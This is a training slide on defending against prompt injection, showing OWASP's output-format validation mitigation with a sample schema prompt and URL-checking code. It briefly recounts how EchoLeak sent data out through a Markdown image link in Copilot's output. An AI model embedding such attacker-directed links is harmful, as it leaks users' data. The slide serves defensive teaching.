Slide 20 of 28
Part 4 · PreventionSlide 20
Slide 20 · Mitigation 2 of 7
Define and validate expected output formats.
Know exactly what the AI should output — and catch it when injection changes that.
📄 OWASP LLM Top 10:2025 · LLM01 Prevention #2
OWASP M2
Define and Validate Expected Output Formats

"Specify clear output formats, request detailed reasoning and source citations, and use deterministic code to validate adherence to these formats."

EchoLeak's exfiltration channel was a Markdown image link in Copilot's output pointing to an attacker server. If output had been validated for unauthorized external URLs before being rendered, the data channel would have been blocked — even after the injection succeeded and even without a server-side patch.

Passing AI output directly to downstream rendering, email senders, or database writes without a validation step is one of the most common AI security gaps.

// System prompt: enforce a schema "Respond ONLY in this JSON format: { 'status': 'found' or 'not_found', 'order_id': string, 'message': string (max 200 chars, no URLs) } Never include external links, image tags, or content outside this schema." // Code validates before rendering response = call_llm(prompt) if not matches_schema(response, ORDER_SCHEMA): log_anomaly(response) return safe_fallback() if contains_external_url(response): block_and_alert(response)

Inject and verify the output validation catches it — independently from whether the model resisted. Test with outputs containing external URLs, unexpected JSON fields, HTML, and Markdown links. Both layers (model constraint + code validation) must work independently.

← BackNext → M3: Filtering + real tools